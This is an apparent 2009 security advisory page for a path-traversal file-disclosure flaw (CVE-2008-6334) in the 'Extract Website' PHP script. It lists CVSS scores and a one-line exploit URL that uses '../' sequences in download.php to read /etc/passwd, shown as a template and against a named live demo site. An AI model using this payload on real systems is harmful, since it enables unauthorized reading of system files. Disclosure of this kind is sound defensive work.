Extract Website (download.php filename) File Disclosure Vulnerability

2009.03.04

Credit: Cold z3ro

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6334

CWE: CWE-22

CVSS Base Score: 7.8/10

Impact Subscore: 6.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: None

Availability impact: None

Extract Website (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo   : http://www.rightscripts.com/extractwebsite/
# about  : This tool help you extract web data include URL links,
       domain names, contact emails, keywords, meta tags, page titles
       or text from other website.
       You can extract these data from a list of website links or from simple text.

# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd

# Example

[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd

==================================
Greetz : www.hackteach.org members , AnGeL25dZ

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Extract Website (download.php filename) File Disclosure Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.